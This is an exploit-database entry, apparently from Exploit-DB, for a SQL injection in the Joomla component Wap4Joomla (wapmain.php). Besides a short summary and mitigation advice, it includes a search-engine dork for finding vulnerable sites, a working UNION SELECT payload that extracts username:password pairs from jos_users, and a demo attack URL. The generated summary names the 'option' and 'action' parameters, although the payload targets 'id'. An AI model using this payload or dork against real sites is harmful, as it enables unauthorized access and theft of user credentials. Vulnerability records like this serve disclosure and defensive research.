header-logo
Suggest Exploit
vendor:
Wap4Joomla
by:
Manas58
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Wap4Joomla
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability

A SQL injection vulnerability exists in Joomla Component Wap4Joomla (wapmain.php) which allows an attacker to execute arbitrary SQL commands via the 'option' and 'action' parameters. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can result in the disclosure of sensitive information from the database, such as user credentials, or even the execution of arbitrary code on the underlying operating system.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability  
      
###########################  
      
Author    : Manas58 
   
Homepage  : http://www.1923turk.com   
  
Script    : Joomla  http://www.joomlaos.de/Downloads/Joomla_und_Mambo_Komponenten/Wap4Joomla.html 
  
Download  : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,2088.html  

Dork      : inurl:wapmain.php?option=      
###########################    
        
[ Vulnerable File ] 
 
    
wap/wapmain.php?option=onews&action=link&id= [ SQL ]  
         
    
[ XpL ]  
      
-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
  
[ Demo] 
 
http://xxxxx/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--


  
##############################################################    
# 
# Gamoscu: http://gamoscu.wordpress.com/
#
# Baybora: http://baybora.wordpress.com/
#
# Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
#
#
#
#
#   
##############################################################

Navigation

Suggest Exploit

Services By CQR